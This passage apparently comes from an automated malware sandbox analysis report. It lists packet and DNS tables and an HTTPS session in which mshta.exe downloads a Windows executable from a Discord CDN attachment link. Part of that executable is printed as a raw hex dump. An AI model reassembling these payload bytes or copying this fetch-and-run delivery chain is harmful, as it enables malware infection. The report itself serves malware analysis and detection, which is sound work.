                                          375,3,="MRXWnFAcv"
                                          376,3,="yHZjdjNyAWAxk"
                                          380,3,="SJCyUd"
                                          3

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 23, 2021 17:00:50.460131884 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:50.460186958 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:50.461015940 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:50.490784883 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:50.490838051 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:50.536437035 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:50.536729097 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:50.550662041 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:50.550688028 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:50.550903082 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:50.551183939 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.032476902 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.072870970 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.075608015 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.075817108 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.075858116 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.075872898 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.075959921 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.075972080 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.075982094 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.076054096 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.076065063 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.076154947 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.076257944 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.076355934 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.076446056 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.076478004 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.076497078 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.076616049 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.076627970 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.076647997 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.076798916 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.076813936 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.076891899 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.076966047 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.077029943 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.077145100 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.077177048 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.077193022 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.077208042 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.077306032 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.077358007 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.077378035 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.077590942 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.077596903 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.077866077 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.078047991 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.078140020 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.078166962 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.078186989 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.078191996 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.078197956 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.078288078 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.078301907 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.078560114 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.078769922 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.078948975 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.079040051 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.079123974 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.079154968 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.079174042 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.079186916 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.079405069 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.091814995 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.092036963 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.092066050 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.092084885 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.092124939 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.092134953 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.092144012 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.092277050 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.092366934 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.092396975 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.092412949 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.092439890 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.092525005 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.092612028 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.092664957 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.092683077 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.093051910 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.093121052 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.093209028 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.093240976 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.093261003 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.093312025 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.093893051 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.094027996 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.094595909 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.094669104 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.094688892 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.095630884 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.095669031 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.095685005 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.095711946 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.095748901 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.096546888 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.096620083 CET49165443192.168.2.22162.159.135.233
                                          Dec 23, 2021 17:00:51.096637964 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.096678019 CET44349165162.159.135.233192.168.2.22
                                          Dec 23, 2021 17:00:51.097479105 CET44349165162.159.135.233192.168.2.22

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 23, 2021 17:00:50.423283100 CET5216753192.168.2.228.8.8.8
                                          Dec 23, 2021 17:00:50.441878080 CET53521678.8.8.8192.168.2.22

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Dec 23, 2021 17:00:50.423283100 CET192.168.2.228.8.8.80xfbd8Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Dec 23, 2021 17:00:50.441878080 CET8.8.8.8192.168.2.220xfbd8No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                          Dec 23, 2021 17:00:50.441878080 CET8.8.8.8192.168.2.220xfbd8No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                          Dec 23, 2021 17:00:50.441878080 CET8.8.8.8192.168.2.220xfbd8No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                          Dec 23, 2021 17:00:50.441878080 CET8.8.8.8192.168.2.220xfbd8No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                          Dec 23, 2021 17:00:50.441878080 CET8.8.8.8192.168.2.220xfbd8No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • cdn.discordapp.com

                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.2249165162.159.135.233443C:\Windows\System32\mshta.exe
                                          TimestampkBytes transferredDirectionData
                                          2021-12-23 16:00:51 UTC0OUTGET /attachments/914827690882781237/923509513628307516/WIvRRHIemuhammadismyfriend.bin HTTP/1.1
                                          Accept: */*
                                          Accept-Language: en-us
                                          UA-CPU: AMD64
                                          Accept-Encoding: gzip, deflate
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Host: cdn.discordapp.com
                                          Connection: Keep-Alive
                                          2021-12-23 16:00:51 UTC0INHTTP/1.1 200 OK
                                          Date: Thu, 23 Dec 2021 16:00:51 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 565248
                                          Connection: close
                                          CF-Ray: 6c22ce1f0f9c4e32-FRA
                                          Accept-Ranges: bytes
                                          Age: 3892
                                          Cache-Control: public, max-age=31536000
                                          Content-Disposition: attachment;%20filename=WIvRRHIemuhammadismyfriend.bin
                                          ETag: "d05719d3327d0a8d4fdf1735c88732fe"
                                          Expires: Fri, 23 Dec 2022 16:00:51 GMT
                                          Last-Modified: Thu, 23 Dec 2021 09:37:06 GMT
                                          CF-Cache-Status: HIT
                                          Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                          x-goog-generation: 1640252226069252
                                          x-goog-hash: crc32c=LJH7PQ==
                                          x-goog-hash: md5=0FcZ0zJ9Co1P3xc1yIcy/g==
                                          x-goog-metageneration: 1
                                          x-goog-storage-class: STANDARD
                                          x-goog-stored-content-encoding: identity
                                          x-goog-stored-content-length: 565248
                                          X-GUploader-UploadID: ADPycdtfPsaFqYaV6wBBlHFFFOUunxI0SOPVae4luzWWkez9VeH1g224k1PWOSzMD-_OnCElL7yo0EdzxZBkk3-AL80
                                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                          2021-12-23 16:00:51 UTC1INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 44 78 35 25 32 46 68 62 4d 6f 33 63 4a 68 47 6a 39 59 6d 46 49 76 53 35 44 64 4d 34 61 42 47 46 49 58 63 73 25 32 42 6a 69 58 63 41 42 67 4a 56 61 7a 58 66 57 6c 63 25 32 42 6d 41 38 61 31 48 6f 62 6a 68 4e 6a 37 36 42 74 38 71 69 6b 45 52 72 53 50 42 51 65 70 71 47 71 4e 66 65 41 78 4f 25 32 46 25 32 42 37 51 6d 57 59 30 55 50 62 78 45 6a 35 5a 50 79 46 53 31 37 25 32 42 25 32 46 70 79 5a 6c 53 73 63 6a 31 59 49 69 75 50 54 66 39 4f 67 41 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d
                                          Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Dx5%2FhbMo3cJhGj9YmFIvS5DdM4aBGFIXcs%2BjiXcABgJVazXfWlc%2BmA8a1HobjhNj76Bt8qikERrSPBQepqGqNfeAxO%2F%2B7QmWY0UPbxEj5ZPyFS17%2B%2FpyZlSscj1YIiuPTf9OgA%3D%3D"}],"group":"cf-nel","m
                                          2021-12-23 16:00:51 UTC1INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e2 97 52 ed a6 f6 3c be a6 f6 3c be a6 f6 3c be bd 6b a2 be 94 f7 3c be a6 f6 3d be 53 f7 3c be 3d 1d f1 be de f7 3c be c0 18 f6 be 92 f7 3c be b8 a4 b8 be fe f7 3c be 74 ad 3f bf fd f6 3c be 74 ad 3d bf 34 f6 3c be 4c 92 39 bf ee f6 3c be 74 ad c3 be 30 f7 3c be bd 6b a7 be ea f7 3c be 81 30 f1 be 78 f6 3c be c9 80 a0 be d0 f7 3c be 04 31 f3 be a5 f6 3c be bd 6b a1 be ee f7 3c
                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$R<<<k<=S<=<<<t?<t=4<L9<t0<k<0x<<1<k<
                                          2021-12-23 16:00:51 UTC3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
                                          2021-12-23 16:00:51 UTC4INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
                                          2021-12-23 16:00:51 UTC5INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 53 56 57 83 e4 f8 83 ec 60 8b 45 18 8b 4d 14 8b 55 10 8b 75 0c 8b 7d 08 0f b7 5c 24 56 89 74 24 28 66 89 de 0f af db 66 89 5c 24 56 66 c7 44 24 58 7b 63 c7 44 24 44 00 00 00 00 c7 44 24 40 07 80 2f 67 66 8b 5c 24 58 66 81 f3 4e db 89 44 24 24 8a 44 24 5b 66 89 5c 24 3e 83 f9 00 88 44 24 23 89 7c 24 1c 89 54 24 18 66 89 74 24 16 0f 84 91 00 00 00 eb 32 8b 44 24 18 8b 48 14 8b 54 24 2c 8b 74 24 28 01 ce 8b 4c 24 1c 01 d1 8b 50 10 89 0c 24 89 74 24 04 89 54 24 08 e8 4d 3c 00 00 8d 65 f4 5f 5e
                                          Data Ascii: USVW`EMUu}\$Vt$(ff\$VfD$X{cD$DD$@/gf\$XfND$$D$[f\$>D$#|$T$ft$2D$HT$,t$(L$P$t$T$M<e_^
                                          2021-12-23 16:00:51 UTC7INData Raw: 5b 5e 5f 5d c3 a1 08 80 00 10 ff d0 0b 6e b8 84 7c 4d c5 81 a8 06 1e f8 a7 2d 63 08 cf 98 41 d5 75 3d b6 0f 6d c7 3b da 09 30 38 3a 14 c2 c5 75 dc a5 9b 84 fc 80 10 49 2c 82 6a 89 44 24 34 8b 44 24 24 8a 4c 24 33 89 44 24 2c 8b 44 24 10 89 44 24 4c 8a 54 24 17 30 d2 88 54 24 53 80 f9 60 0f 86 67 fe ff ff e9 df fe ff ff a1 00 80 00 10 ff d0 0b 6e b8 84 7c 4d c5 81 a8 06 1e f8 a7 2d 63 08 cf 98 41 d5 75 3d b6 0f 6d c7 3b da 09 30 38 3a 14 c2 c5 75 dc a5 9b 84 fc 80 10 49 2c 82 6a 89 44 24 34 83 7c 24 34 00 0f 84 55 ff ff ff eb b9 e9 af fe ff ff 90 90 90 90 90 90 90 55 89 e5 83 ec 08 c7 45 fc 0f 2b c6 47 8b 45 fc 05 f1 d4 39 b8 83 c4 08 5d c3 90 90 90 90 90 90 55 89 e5 83 ec 10 8b 45 08 c6 45 ff 76 66 8b 4d fc 83 f8 00 89 45 f8 66 89 4d f6 74 18 eb 0a e8 6c
                                          Data Ascii: [^_]n|M-cAu=m;08:uI,jD$4D$$L$3D$,D$D$LT$0T$S`gn|M-cAu=m;08:uI,jD$4|$4UUE+GE9]UEEvfMEfMtl
                                          2021-12-23 16:00:51 UTC8INData Raw: ff ff ff 66 83 bc 24 92 00 00 00 50 0f 84 1c 01 00 00 e9 be fd ff ff 8b 44 24 4c 89 84 24 98 02 00 00 8b 4c 24 54 89 8c 24 9c 02 00 00 66 8b 94 24 a4 02 00 00 66 81 c2 89 f6 c6 84 24 97 02 00 00 54 66 8b b4 24 8c 00 00 00 8a 5c 24 51 88 9c 24 97 02 00 00 66 39 d6 0f 84 68 fd ff ff e9 72 fd ff ff 66 8b 84 24 a4 02 00 00 66 35 8a 09 66 39 84 24 8e 00 00 00 74 9e e9 57 fd ff ff 31 c0 8b 8c 24 88 02 00 00 8b 54 24 54 f7 d2 8b 74 24 4c f7 d6 89 b4 24 98 02 00 00 89 94 24 9c 02 00 00 89 e2 c7 02 00 00 00 00 8b 15 04 80 00 10 89 44 24 38 89 4c 24 34 ff d2 83 ec 04 31 c9 89 e2 c7 42 08 00 00 00 00 c7 42 04 00 00 00 00 c7 02 00 00 00 00 8b 15 2c 80 00 10 89 44 24 30 89 4c 24 2c ff d2 83 ec 0c 8b 4c 24 34 83 c1 01 89 8c 24 88 02 00 00 c7 44 24 64 00 00 00 00 81 f9
                                          Data Ascii: f$PD$L$L$T$f$f$Tf$\$Q$f9hrf$f5f9$tW1$T$Tt$L$$D$8L$41BB,D$0L$,L$4$D$d
                                          2021-12-23 16:00:51 UTC9INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
                                          2021-12-23 16:00:51 UTC11INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
                                          2021-12-23 16:00:51 UTC12INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
                                          2021-12-23 16:00:51 UTC13INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
                                          2021-12-23 16:00:51 UTC15INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
                                          2021-12-23 16:00:51 UTC16INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
                                          2021-12-23 16:00:51 UTC17INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
